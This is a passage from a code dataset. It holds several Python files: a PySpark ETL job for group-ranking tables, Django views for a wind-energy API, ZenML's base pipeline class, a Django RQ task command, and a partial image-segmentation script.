TimestampType())\n]))\n\nattributes = ArrayType(StructType([\n StructField('name', StringType()),\n StructField('values', ArrayType(StringType())),\n StructField('allowNull', BooleanType()),\n StructField('excludeValue', BooleanType()),\n StructField('regex', BooleanType())\n]))\n\nsegmentations = ArrayType(StructType([\n StructField('name', StringType()),\n StructField('description', StringType()),\n StructField('default', BooleanType()),\n StructField('attributes', attributes),\n StructField('capabilities', capabilities),\n StructField('purchaserName', StringType()),\n StructField('purchaserCode', StringType())\n]))\n\nconfiguration_details = StructType([\n StructField('utilityFields', utility_fields),\n StructField('rankingFields', ranking_fields),\n StructField('segmentations', segmentations),\n StructField('startDate', TimestampType()),\n StructField('endDate', TimestampType())\n])\n\npolicy_details = ArrayType(StructType([\n StructField('number', StringType()),\n StructField('sourceCode', StringType()),\n StructField('default', StringType())\n]))\n\ncustomer_details = ArrayType(StructType([\n StructField('purchaserName', StringType()),\n StructField('purchaserCode', StringType()),\n StructField('clientLegalName', StringType()),\n StructField('policyDetails', policy_details),\n StructField('activeDate', TimestampType()),\n StructField('terminationDate', TimestampType())\n]))\n\ngroup_config = StructType([\n StructField('rallyClientName', StringType()),\n StructField('customerDetails', customer_details),\n StructField('configurationDetails', configuration_details),\n StructField('capabilities', capabilities),\n StructField('transformations', ArrayType(StringType()))\n])\n\nconfigurations = StructType([\n StructField('groupConfig', group_config),\n StructField('terminationDate', TimestampType()),\n StructField('created', TimestampType()),\n StructField('modified', TimestampType())\n])\n\ndef dreamliner_raw(mongo_path='/integration/data/etl/user_testing/mongo_extracts/dreamliner/group_segmentations'):\n spark = (\n SparkSession\n .builder\n .appName('dreamliner ETL')\n .config(\"spark.dynamicAllocation.enabled\", \"false\")\n .config(\"spark.sql.parquet.compression.codec\", \"snappy\")\n .enableHiveSupport()\n .getOrCreate()\n )\n\n df = spark.read.json(mongo_path)\n group_config_df = (\n df\n .outerExplode('configurations', 'config')\n .select(\n '_id',\n 'rallyClientName',\n 'rallyOwned',\n 'created',\n 'modified',\n from_json(to_json(col('config')), configurations).alias('c')\n )\n .select(\n col('_id.oid').alias('configuration_id'),\n col('rallyClientName').alias('rally_client_name'),\n col('rallyOwned').cast(StringType()).alias('rally_owned'),\n col('created').alias('doc_created'),\n col('modified').alias('doc_modified'),\n col('c.groupConfig').alias('gc'),\n col('c.terminationDate').alias('config_termination_date'),\n col('c.created').alias('config_created_date'),\n col('c.modified').alias('config_modified_date')\n )\n .select(\n 'configuration_id',\n 'rally_client_name',\n 'rally_owned',\n 'doc_created',\n 'doc_modified',\n 'config_termination_date',\n 'config_created_date',\n 'config_modified_date',\n to_date(coalesce('config_modified_date', 'config_created_date')).alias('start_date'),\n col('gc.rallyClientName').alias('gc_rally_client_name'),\n col('gc.customerDetails').alias('customer_details'),\n col('gc.configurationDetails').alias('configuration_details'),\n col('gc.configurationDetails.startDate').alias('configuration_start_ts'),\n 
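# (editorial note) these configuration start/end timestamps bound the config's validity window\n            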
col('gc.configurationDetails.endDate').alias('configuration_end_ts'),\n col('gc.capabilities').alias('gc_capabilities'),\n col('gc.transformations').alias('gc_transformations')\n )\n )\n\n gc_ranking_df = (\n group_config_df\n .outerExplode('configuration_details.rankingFields.relationshipRanking','rExp')\n .select(\n 'configuration_id',\n 'rally_client_name',\n 'rally_owned',\n 'configuration_start_ts',\n 'configuration_end_ts',\n col('config_termination_date').alias('configuration_termination_ts'),\n lit('relationship').alias('ranking_type'),\n coalesce(col('rExp.relationship'), lit('')).alias('ranking_field_name'),\n coalesce(col('rExp.rank'), lit('')).alias('rank'),\n 'start_date',\n lit('optum').alias('partner'),\n concat_ws(',', 'start_date').alias('compare_key')\n )\n .unionAll(\n group_config_df\n .outerExplode('configuration_details.rankingFields.eligibilitySourceSys','eExp')\n .select(\n 'configuration_id',\n 'rally_client_name',\n 'rally_owned',\n 'configuration_start_ts',\n 'configuration_end_ts',\n col('config_termination_date').alias('configuration_termination_ts'),\n lit('source_system').alias('ranking_type'),\n coalesce(col('eExp.sourceSystem'), lit('')).alias('ranking_field_name'),\n coalesce(col('eExp.rank'), lit('')).alias('rank'),\n 'start_date',\n lit('optum').alias('partner'),\n concat_ws(',', 'start_date').alias('compare_key')\n )\n )\n )\n gc_ranking_df.printSchema()\n gc_ranking_df.show(100, False)\n\n spark.sql(\"DROP TABLE IF EXISTS edw_staging.stg_dim_dreamliner_group_ranking\")\n logger.info(\"Writing data to stg_dim_dreamliner_group_ranking table\")\n (\n gc_ranking_df\n .write\n .format('orc')\n .mode('overwrite')\n .option(\"compression\", \"snappy\")\n .saveAsTable(\"{}.stg_dim_dreamliner_group_ranking\".format('edw_staging'))\n )\n\n base_ranking = spark.read.table('{}.dim_dreamliner_group_ranking'.format('edw'))\n window = Window.partitionBy('rally_client_name', 'configuration_start_ts', 'configuration_end_ts', 'ranking_type', 'ranking_field_name').orderBy('start_date')\n window_desc = Window.partitionBy('rally_client_name', 'configuration_start_ts', 'configuration_end_ts', 'ranking_type', 'ranking_field_name').orderBy(col('start_date').desc())\n lit_end_date = lit('2999-12-31').cast(DateType())\n\n base_ranking_stg_unioun = (\n base_ranking\n .select(\n 'configuration_id',\n 'rally_client_name',\n 'rally_owned',\n 'configuration_start_ts',\n 'configuration_end_ts',\n 'configuration_termination_ts',\n 'ranking_type',\n 'ranking_field_name',\n 'rank',\n 'start_date',\n 'partner',\n concat_ws(',', 'start_date').alias('compare_key')\n )\n .unionAll(gc_ranking_df)\n .withColumn('lag_compare_key', lag(col('compare_key')).over(window))\n )\n base_ranking_stg_unioun.show(10, False)\n\n dim_dreamliner_ranking = (\n base_ranking_stg_unioun\n .select(\n 'configuration_id',\n 'rally_client_name',\n 'rally_owned',\n 'configuration_start_ts',\n 'configuration_end_ts',\n 'configuration_termination_ts',\n 'ranking_type',\n 'ranking_field_name',\n 'rank',\n 'partner',\n when(col('compare_key') == col('lag_compare_key'),\n lit(None)).otherwise(col('start_date')).alias('start_date')\n )\n .filter(col('start_date').isNotNull())\n .withColumn('end_date', coalesce(date_sub(lag('start_date').over(window_desc), 1), lit_end_date))\n .withColumn('warehouse_update_user', lit('airflow'))\n .withColumn('warehouse_update_ts', current_timestamp())\n )\n\n dim_dreamliner_ranking.show(100, False)\n (\n dim_dreamliner_ranking\n .write\n .format('orc')\n .mode('overwrite')\n 
.option(\"compression\", \"snappy\")\n .saveAsTable(\"{}.dim_dreamliner_group_ranking_new\".format('edw'))\n )\n spark.sql(\"ALTER TABLE {}.dim_dreamliner_group_ranking RENAME TO {}.dim_dreamliner_group_ranking_old\".format('edw', 'edw'))\n spark.sql(\"ALTER TABLE {}.dim_dreamliner_group_ranking_new RENAME TO {}.dim_dreamliner_group_ranking\".format('edw', 'edw'))\n spark.sql(\"DROP TABLE IF EXISTS {}.dim_dreamliner_group_ranking_old\".format('edw'))\n\ndreamliner_raw('/integration/data/etl/user_testing/mongo_extracts/dreamliner/group_segmentations')\n","sub_path":"backup_0824/backup/old/ranking.py","file_name":"ranking.py","file_ext":"py","file_size_in_byte":10402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"371447156","text":"# Copyright 2013 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# Author: Josh Livni (jlivni@google.com)\n\n\nfrom datetime import datetime\nimport json\n\nfrom django.conf import settings\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.template import RequestContext\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, Http404\n\nfrom windfriendly.models import BPA, Normalized\nfrom windfriendly.parsers import BPAParser\n\ndef json_response(func):\n \"\"\"\n A decorator thats takes a view response and turns it\n into json. 
If a callback is added through GET or POST\n the response is JSONP.\n \"\"\"\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n try:\n data = json.dumps(objects)\n if 'callback' in request.REQUEST:\n # a jsonp response!\n data = '%s(%s);' % (request.REQUEST['callback'], data)\n return HttpResponse(data, \"text/javascript\")\n except:\n data = json.dumps(str(objects))\n return HttpResponse(data, \"application/json\")\n return decorator\n\n\ndef getBalancingAuthority(lat, lng):\n return 'BPA'\n\n@json_response\ndef status(request):\n lat = request.GET.get('lat', '')\n lng = request.GET.get('lng', '')\n\n ba = getBalancingAuthority(lat, lng)\n raw = BPA.objects.latest('date')\n\n percent_green = raw.wind * 1.0 / (raw.wind + raw.hydro + raw.thermal) * 100.0\n time = raw.date.strftime('%Y-%m-%d %H:%M')\n\n data = {\n 'lat': lat,\n 'lng': lng,\n 'balancing_authority': 'BPA',\n 'time': time,\n 'percent_green': round(percent_green,3)\n }\n return data\n template = 'templates/default.json'\n return render_to_response(template, RequestContext(request,{'json':data}))\n\n@json_response\ndef forecast(request):\n lat = request.GET.get('lat', '')\n lng = request.GET.get('lng', '')\n\n rows = BPA.objects.all().order_by('-id')[:289]\n hourly_avg = 0\n forecast = []\n for i, r in enumerate(rows):\n hourly_avg += r.wind * 1.0 / (r.wind + r.hydro + r.thermal) * 100.0\n if i and not i % 12: # 5 minute intervals\n data = {\n 'hour': i / 12,\n 'percent_green': round(hourly_avg / 12,3)\n }\n forecast.append(data)\n hourly_avg = 0\n return {\n 'forecast' : forecast,\n 'balancing_authority': 'BPA'\n }\n\n@json_response\ndef update(request, utility):\n if utility == 'bpa':\n parser = BPAParser()\n return parser.update()\n","sub_path":"site/windfriendly/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"274545888","text":"# Copyright (c) maiot GmbH 2020. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. 
See the License for the specific language governing\n# permissions and limitations under the License.\n\"\"\"Base High-level ZenML Pipeline definition\"\"\"\n\nimport time\nfrom abc import abstractmethod\nfrom typing import Dict, Text, Any, Optional, List\nfrom uuid import uuid4\n\nfrom zenml.backends.orchestrator import OrchestratorBaseBackend\nfrom zenml.constants import CONFIG_VERSION\nfrom zenml.datasources import BaseDatasource\nfrom zenml.enums import PipelineStatusTypes\nfrom zenml.exceptions import AlreadyExistsException\nfrom zenml.logger import get_logger\nfrom zenml.metadata import ZenMLMetadataStore\nfrom zenml.repo import Repository, ArtifactStore\nfrom zenml.standards import standard_keys as keys\nfrom zenml.steps import BaseStep\nfrom zenml.utils import source_utils\nfrom zenml.utils.analytics_utils import track, CREATE_PIPELINE, RUN_PIPELINE, \\\n GET_PIPELINE_ARTIFACTS\nfrom zenml.utils.print_utils import to_pretty_string, PrintStyles\n\nlogger = get_logger(__name__)\n\n\nclass BasePipeline:\n \"\"\"Base class for all ZenML pipelines.\n\n Every ZenML pipeline should override this class.\n \"\"\"\n PIPELINE_TYPE = 'base'\n\n def __init__(self,\n name: Text = None,\n enable_cache: Optional[bool] = True,\n steps_dict: Dict[Text, BaseStep] = None,\n backend: OrchestratorBaseBackend = None,\n metadata_store: Optional[ZenMLMetadataStore] = None,\n artifact_store: Optional[ArtifactStore] = None,\n datasource: Optional[BaseDatasource] = None,\n datasource_commit_id: Optional[Text] = None,\n pipeline_name: Optional[Text] = None,\n *args, **kwargs):\n \"\"\"\n Construct a base pipeline. This is a base interface that is meant\n to be overridden in multiple other pipeline use cases.\n\n Args:\n name: Outward-facing name of the pipeline.\n pipeline_name: A unique name that identifies the pipeline after\n it is run.\n enable_cache: Boolean, indicates whether or not caching\n should be used.\n steps_dict: Optional dict of steps.\n backend: Orchestrator backend.\n metadata_store: Configured metadata store. If None,\n the default metadata store is used.\n artifact_store: Configured artifact store. 
If None,\n the default artifact store is used.\n datasource: The datasource to use.\n datasource_commit_id: The datasource commit id to use.\n \"\"\"\n # Generate a name if not given\n if name is None:\n name = str(round(time.time() * 1000))\n self.name = name\n self._immutable = False\n\n # Metadata store\n if metadata_store:\n self.metadata_store: ZenMLMetadataStore = metadata_store\n else:\n # use default\n self.metadata_store: ZenMLMetadataStore = \\\n Repository.get_instance().get_default_metadata_store()\n\n if pipeline_name:\n # This means its been loaded in through YAML, try to get context\n self.pipeline_name = pipeline_name\n self.file_name = self.pipeline_name + '.yaml'\n else:\n # if pipeline_name is None then its a new pipeline\n self.pipeline_name = self.create_pipeline_name_from_name()\n self.file_name = self.pipeline_name + '.yaml'\n # check duplicates here as its a 'new' pipeline\n self._check_registered()\n track(event=CREATE_PIPELINE)\n logger.info(f'Pipeline {name} created.')\n\n self.enable_cache = enable_cache\n\n if steps_dict is None:\n self.steps_dict: Dict[Text, BaseStep] = {}\n else:\n self.steps_dict = steps_dict\n\n # Default to local\n if backend is None:\n self.backend = OrchestratorBaseBackend()\n else:\n self.backend = backend\n\n # Artifact store\n if artifact_store:\n self.artifact_store = artifact_store\n else:\n # use default\n self.artifact_store = \\\n Repository.get_instance().get_default_artifact_store()\n\n # Datasource\n if datasource:\n self.datasource = datasource\n self.datasource_commit_id = datasource.get_latest_commit()\n else:\n self.datasource = None\n self.datasource_commit_id = None\n\n if datasource_commit_id:\n self.datasource_commit_id = datasource_commit_id\n\n self._source = source_utils.resolve_class(self.__class__)\n self._kwargs = {\n keys.PipelineDetailKeys.NAME: self.pipeline_name,\n keys.PipelineDetailKeys.ENABLE_CACHE: self.enable_cache,\n }\n if kwargs:\n self._kwargs.update(kwargs)\n\n def __str__(self):\n return to_pretty_string(self.to_config())\n\n def __repr__(self):\n return to_pretty_string(self.to_config(), style=PrintStyles.PPRINT)\n\n @property\n def is_executed_in_metadata_store(self):\n try:\n # if we find context, then it has been executed\n self.metadata_store.get_pipeline_context(self)\n return True\n except Exception as _:\n return False\n\n @abstractmethod\n def get_tfx_component_list(self, config: Dict[Text, Any]) -> List:\n \"\"\"\n Converts config to TFX components list. 
This is the point in the\n framework where ZenML Steps get translated into TFX pipelines.\n\n Args:\n config: dict of ZenML config.\n \"\"\"\n pass\n\n @abstractmethod\n def steps_completed(self) -> bool:\n \"\"\"Returns True if all steps complete, else raises exception\"\"\"\n pass\n\n @staticmethod\n def get_name_from_pipeline_name(pipeline_name: Text):\n \"\"\"\n Gets name from pipeline name.\n\n Args:\n pipeline_name (str): simple string name.\n \"\"\"\n return \"_\".join(pipeline_name.split('_')[1:-1])\n\n @classmethod\n def from_config(cls, config: Dict):\n \"\"\"\n Convert from pipeline config to ZenML Pipeline object.\n\n All steps are also populated and configuration set to parameters set\n in the config file.\n\n Args:\n config: a ZenML config in dict-form (probably loaded from YAML).\n \"\"\"\n # start with artifact store\n artifact_store = ArtifactStore(config[keys.GlobalKeys.ARTIFACT_STORE])\n\n # metadata store\n metadata_store = ZenMLMetadataStore.from_config(\n config=config[keys.GlobalKeys.METADATA_STORE]\n )\n\n # orchestration backend\n backend = OrchestratorBaseBackend.from_config(\n config[keys.GlobalKeys.BACKEND])\n\n # pipeline configuration\n p_config = config[keys.GlobalKeys.PIPELINE]\n kwargs = p_config[keys.PipelineKeys.ARGS]\n pipeline_name = kwargs.pop(keys.PipelineDetailKeys.NAME)\n pipeline_source = p_config[keys.PipelineKeys.SOURCE]\n\n # populate steps\n steps_dict: Dict = {}\n for step_key, step_config in p_config[keys.PipelineKeys.STEPS].items():\n steps_dict[step_key] = BaseStep.from_config(step_config)\n\n # datasource\n datasource = BaseDatasource.from_config(\n config[keys.GlobalKeys.PIPELINE])\n\n # datasource commit\n datasource_commit_id = p_config[keys.PipelineKeys.DATASOURCE_COMMIT_ID]\n\n class_ = source_utils.load_source_path_class(pipeline_source)\n\n obj = class_(\n steps_dict=steps_dict,\n backend=backend,\n artifact_store=artifact_store,\n metadata_store=metadata_store,\n datasource=datasource,\n datasource_commit_id=datasource_commit_id,\n pipeline_name=pipeline_name,\n name=cls.get_name_from_pipeline_name(pipeline_name),\n **kwargs\n )\n obj._immutable = True\n return obj\n\n def _check_registered(self):\n if Repository.get_instance().get_pipeline_by_name(\n self.name) is not None:\n raise AlreadyExistsException(\n name=self.name, resource_type='pipeline')\n\n def _validate_steps(self):\n \"\"\"Ensure that steps are of the right type\"\"\"\n for step_name, step_val in self.steps_dict.items():\n if not issubclass(type(step_val), BaseStep):\n raise AssertionError(\n f'Step {step_name} needs to be an object that is a '\n f'sub-class of: {BaseStep}')\n\n def add_datasource(self, datasource: BaseDatasource,\n commit_id: Text = None):\n \"\"\"\n Add datasource to pipeline.\n\n Args:\n datasource: class of type BaseDatasource.\n commit_id: optionally the commit of the datasource to use. 
If\n left None, then latest commit is used.\n \"\"\"\n self.datasource = datasource\n if commit_id is None:\n self.datasource_commit_id = datasource.get_latest_commit()\n\n def create_pipeline_name_from_name(self):\n \"\"\"Creates a unique pipeline name from user-provided name.\"\"\"\n return self.PIPELINE_TYPE.lower() + '_' + self.name + '_' + str(\n uuid4())\n\n def get_steps_config(self) -> Dict:\n \"\"\"Convert Step classes to steps config dict.\"\"\"\n steps_config = {}\n for step_key, step in self.steps_dict.items():\n steps_config[step_key] = step.to_config()\n\n return {keys.PipelineKeys.STEPS: steps_config}\n\n def get_pipeline_config(self):\n \"\"\"Get pipeline config\"\"\"\n steps_config = self.get_steps_config()\n steps_config.update({\n keys.PipelineKeys.ARGS: self._kwargs,\n keys.PipelineKeys.SOURCE: self._source,\n keys.PipelineKeys.DATASOURCE: self.datasource.to_config() if\n self.datasource is not None else {},\n keys.PipelineKeys.DATASOURCE_COMMIT_ID: self.datasource_commit_id,\n })\n return steps_config\n\n def to_config(self) -> Dict:\n \"\"\"Converts entire pipeline to ZenML config.\"\"\"\n return {\n keys.GlobalKeys.VERSION: CONFIG_VERSION,\n keys.GlobalKeys.METADATA_STORE: self.metadata_store.to_config(),\n keys.GlobalKeys.ARTIFACT_STORE: self.artifact_store.path,\n keys.GlobalKeys.BACKEND: self.backend.to_config(),\n keys.GlobalKeys.PIPELINE: self.get_pipeline_config(),\n }\n\n def get_status(self) -> Text:\n \"\"\"Get status of pipeline.\"\"\"\n store = self.metadata_store\n return store.get_pipeline_status(self)\n\n def register_pipeline(self, config: Dict[Text, Any]):\n \"\"\"\n Registers a pipeline in the artifact store as a YAML file.\n\n Args:\n config: dict representation of ZenML config.\n \"\"\"\n self._check_registered()\n Repository.get_instance().register_pipeline(\n file_name=self.file_name, config=config)\n\n def load_config(self) -> Dict[Text, Any]:\n \"\"\"Loads a config dict from yaml file.\"\"\"\n return Repository.get_instance().load_pipeline_config(\n file_name=self.file_name)\n\n @track(event=GET_PIPELINE_ARTIFACTS)\n def get_artifacts_uri_by_component(\n self, component_name: Text, resolve_locally: bool = True):\n \"\"\"\n Gets the artifacts of any component within a pipeline. All artifacts\n are resolved locally if resolve_locally flag is set.\n\n Args:\n component_name (str): name of component\n resolve_locally (bool): If True, artifact is downloaded locally.\n \"\"\"\n # TODO[HIGH]: In case of multiple artifacts (from the selected\n # component) no other information rather then the uri is passed\n # forward. 
This creates a situation where you would need to make\n # really hard assumptions and hardcode the index of the uri within\n # the returned list\n status = self.metadata_store.get_pipeline_status(self)\n if status != PipelineStatusTypes.Succeeded.name:\n raise AssertionError('Cannot retrieve as pipeline is not succeeded.')\n artifacts = self.metadata_store.get_artifacts_by_component(\n self, component_name)\n # Download if not base\n uris = []\n for a in artifacts:\n uris.append(self.artifact_store.resolve_uri_locally(\n a.uri) if resolve_locally else a.uri)\n return uris\n\n def copy(self, new_name: Text):\n \"\"\"\n Deep copy the pipeline and therefore remove mutability requirement.\n\n Args:\n new_name (str): New name for copied pipeline.\n \"\"\"\n class_ = self.__class__\n args = self.__dict__.copy()\n\n # Doing this will reset immutability\n args.pop('pipeline_name')\n args['name'] = new_name\n obj = class_(**args)\n obj._immutable = False\n return obj\n\n def run_config(self, config: Dict[Text, Any]):\n \"\"\"\n Gets TFX pipeline from config.\n\n Args:\n config: dict of ZenML config.\n \"\"\"\n assert issubclass(self.backend.__class__, OrchestratorBaseBackend)\n self.backend.run(config)\n\n @track(event=RUN_PIPELINE)\n def run(self,\n backend: OrchestratorBaseBackend = None,\n metadata_store: Optional[ZenMLMetadataStore] = None,\n artifact_store: Optional[ArtifactStore] = None):\n \"\"\"\n Run the pipeline associated with the datasource.\n\n Args:\n backend: orchestrator backend for pipeline.\n metadata_store: chosen metadata store, if None use default\n artifact_store: chosen artifact store, if None use default\n \"\"\"\n\n # TODO: [HIGH] Important, think about separating register and run\n # and that way ask user to input name while registering pipeline.\n\n # Resolve default\n if metadata_store:\n logger.warning('Changing the metadata_store or artifact_store '\n 'might cause your pipelines to be '\n 'non-reproducible and non-comparable.')\n self.metadata_store = metadata_store\n\n if artifact_store:\n logger.warning('Changing the metadata_store or artifact_store '\n 'might cause your pipelines to be '\n 'non-reproducible and non-comparable.')\n self.artifact_store = artifact_store\n\n if backend:\n self.backend = backend\n\n # We do not allow ml metadata to get polluted by repeated runs\n if self.is_executed_in_metadata_store:\n logger.info(f'Pipeline: `{self.name}` has already been executed '\n f'for the connected metadata store. Pipelines are '\n f'immutable after they run within the same metadata '\n f'store. If the pipeline failed, then try using '\n f'the `pipeline.copy(new_name)` method to copy the '\n f'current `pipeline` and give it a new name.')\n return\n\n # Check if steps are complete\n self.steps_completed()\n\n # Validate steps\n self._validate_steps()\n\n # assert some datasource stuff\n if self.datasource and self.datasource.metadata_store.to_config() != \\\n self.metadata_store.to_config():\n raise AssertionError(\n 'The metadata_store of the specified datasource is different '\n 'from this pipeline. Pipelines and their datasources need to '\n 'be in the same metadata_store.')\n if self.datasource and self.datasource.artifact_store.path != \\\n self.artifact_store.path:\n raise AssertionError(\n 'The artifact_store of the specified datasource is different '\n 'from this pipeline. 
Pipelines and their datasources need to '\n 'be in the same artifact_store.')\n\n if self._immutable:\n # This means its an 'older' pipeline that has been loaded in via\n # YAML but does not exist in the metadata store, so we are safe\n # to run it without inferring new version pins. This will result\n # in a repeated run.\n logger.info('Pipeline is an immutable state: Any changes made '\n 'after loading it will not be reflected in this run.')\n config = self.load_config()\n else:\n # This means its a brand new pipeline\n config = self.to_config()\n # Register in the repository\n self.register_pipeline(config)\n\n self.run_config(config)\n\n # After running, pipeline is immutable\n self._immutable = True\n","sub_path":"zenml/pipelines/base_pipeline.py","file_name":"base_pipeline.py","file_ext":"py","file_size_in_byte":17394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"166769946","text":"from django.core.management.base import BaseCommand, CommandError\nimport django_rq\n\n\nclass TaskCommand(BaseCommand):\n help = 'Run task asynchronously; used to schedule tasks via crontab'\n\n def add_arguments(self, parser):\n parser.add_argument('--queue', '-Q', default='', help='The queue to work on')\n #parser.add_argument('num_beans', type=int)\n\n # def handle(self, *args, **options):\n # try:\n # #num_beans = int(options['num_beans'])\n # queue_name = options['queue']\n\n # from tasks.jobs import count_beans\n # from tasks.models import CountBeansTask as MyTask\n\n # param_names = MyTask.retrieve_param_names()\n # params = dict([item for item in options.items() if item[0] in param_names])\n\n # if queue_name:\n # queue = django_rq.get_queue(queue_name)\n # #queue.enqueue(count_beans, num_beans=num_beans)\n # queue.enqueue(count_beans, **params)\n # else:\n # #count_beans.delay(num_beans=num_beans)\n # count_beans.delay(**params)\n\n # except Exception as e:\n # raise CommandError('ERROR: %s' % str(e))\n # self.stdout.write('Done')\n\n def run_task(self, TaskClass, job_func, **options):\n try:\n queue_name = options['queue']\n\n param_names = TaskClass.retrieve_param_names()\n params = dict([item for item in options.items() if item[0] in param_names])\n\n if queue_name:\n queue = django_rq.get_queue(queue_name)\n #queue.enqueue(count_beans, num_beans=num_beans)\n job = queue.enqueue(job_func, **params)\n else:\n #count_beans.delay(num_beans=num_beans)\n job = job_func.delay(**params)\n\n except Exception as e:\n raise CommandError('ERROR: %s' % str(e))\n\n self.stdout.write('%s scheduled (job=%s)' % (TaskClass.__name__, job.get_id()))\n","sub_path":"tasks/task_command.py","file_name":"task_command.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"379220406","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: shiweiqiang Econ4A\n\"\"\"\nimport os\nimport glob\nimport itertools\nimport numpy as np\nfrom scipy.stats import multivariate_normal\nfrom PIL import Image\nfrom skimage import io\nfrom matplotlib import pyplot as plt\n\n# Load image\nSUPPORTED_EXTENSIONS = [\"bmp\", \"png\", \"jpg\", \"jpeg\"]\ndef dataset_files(root):\n #returns a list of all image files in the given directory\n return list(itertools.chain.from_iterable(\n glob.glob(os.path.join( root,\"*.{}\".format(ext) ) )\n for ext in SUPPORTED_EXTENSIONS))\n\n#讀取目錄的DIR\nImglist = dataset_files(\"originals/\")\nN = len(Imglist)\nprint(\"Image N\",N)\n\n\n# to 
array\nfor i in range(N):\n Imglist[i] = Image.open(Imglist[i])\n Imglist[i] = np.array(Imglist[i])\n print(\"Original Image shape \",i+1,\":\",Imglist[i].shape)\n\n'''\nimage = Image.open(\"duck.jpg\")\nW,H = image.size\n# resize img to H/2 W/2 || speedup 5X\n# to remove this opinion ,replace all \"/2)\" to \"/2)\"\nH = int(H/2)\nW = int(W/2)\nimage = image.resize((W,H))\nimage = np.array(image)\nprint(image.shape)\n'''\n\n# Resize img to speedup\nH = int((Imglist[0].shape[0]))\nW = int((Imglist[0].shape[1]))\n\"\"\"\nImglist = dataset_files(\"originals/\")\nfor i in range(N):\n Imglist[i] = Image.open(Imglist[i])\n Imglist[i] = Imglist[i].resize((W,H))\n Imglist[i] = np.array(Imglist[i])\n print(\"Resize Image shape \",i+1,\":\",Imglist[i].shape)\n\"\"\"\n\n# Crop img\ndef sample_crop(Bg_image_array, UL_local_tuple, LR_local_tuple):\n \"\"\"\n # parameter:\n image the background image by numpy_array\n UL_local_tuple (x1,y1) the location of Upper Left Corner\n LR_local_tuple (x2,y2) the location of Lower Right Corner\n \"\"\"\n (x1, y1) = UL_local_tuple\n (x2, y2) = LR_local_tuple\n x1 = int(x1)\n x2 = int(x2)\n y1 = int(y1)\n y2 = int(y2)\n image_crop_H = y2 - y1\n image_crop_W = x2 - x1\n sample_array = np.zeros((image_crop_H, image_crop_W, Bg_image_array.shape[2]), dtype=np.uint8)\n for i in range(image_crop_H): # H\n for j in range(image_crop_W): # W\n sample_array[i][j] = Bg_image_array[i + y1][j + x1]\n return sample_array\n\n\n\n\n\"\"\"\n# Method 1-----------------------------------------------\nminion_sample_head = Sample_Crop(Imglist[0], (70/2,367/2), (138/2,448/2))\nprint(\"Positive Sample:\",minion_sample_head.shape)\nsolve_Img = Image.fromarray(minion_sample_head, mode=\"RGB\")\nsolve_Img.save(\"minion_sample_head.jpg\")\n\nminion_sample_body = Sample_Crop(Imglist[0], (70/2,470/2), (128/2,530/2))\nprint(\"Positive Sample:\",minion_sample_body.shape)\nsolve_Img = Image.fromarray(minion_sample_body, mode=\"RGB\")\nsolve_Img.save(\"minion_sample_body.jpg\")\n\nbg_sample = Sample_Crop(Imglist[0], (470/2,460/2), (570/2,540/2))\nprint(\"Negative Sample:\",bg_sample.shape)\nsolve_Img_Bg = Image.fromarray(bg_sample, mode=\"RGB\")\nsolve_Img_Bg.save(\"bg_sample.jpg\")\n\n# train\ntrainP_head = minion_sample_head\ntrainP_head = trainP_head.reshape((minion_sample_head.shape[0]*minion_sample_head.shape[1]),3)\nprint(\"trainP_head.Shape:\",trainP_head.shape)\n\ntrainP_body = minion_sample_body\ntrainP_body = trainP_body.reshape((minion_sample_body.shape[0]*minion_sample_body.shape[1]),3)\nprint(\"trainP_head.Shape:\",trainP_body.shape)\n\ntrainN_Bg = bg_sample\ntrainN_Bg = trainN_Bg.reshape((bg_sample.shape[0]*bg_sample.shape[1]),3)\nprint(\"trainN.Shape:\",trainN_Bg.shape)\n\ntmp1 = np.cov(trainP_head,rowvar=False)\ncov_head = np.diag(np.diag(tmp1)) # 斜對角矩陣 只有斜線有0\n\ntmp2 = np.cov(trainP_body,rowvar=False)\ncov_body = np.diag(np.diag(tmp2))\n\ntmp3 = np.cov(trainN_Bg,rowvar=False)\ncov_bg = np.diag(np.diag(tmp3))\n\n# image_mark_minion[i] = np.zeros(Imglist[0].shape, dtype=np.uint8)\nImglist_output = Imglist.copy()\n\nfor n in range(N):\n for i in range(H): # H\n for j in range(W): # W\n r1 = multivariate_normal.pdf(Imglist[n][i, j, :], trainP_head.mean(axis=0), cov_head)\n r2 = multivariate_normal.pdf(Imglist[n][i, j, :], trainP_body.mean(axis=0), cov_body)\n r3 = multivariate_normal.pdf(Imglist[n][i, j, :], trainN_Bg.mean(axis=0), cov_bg, allow_singular=True)\n\n if ((r1 > r3) or (r2 > r3)): # minions\n Imglist_output[n][i, j, :] = (255, 255, 255)\n else: # bg\n Imglist_output[n][i, j, 
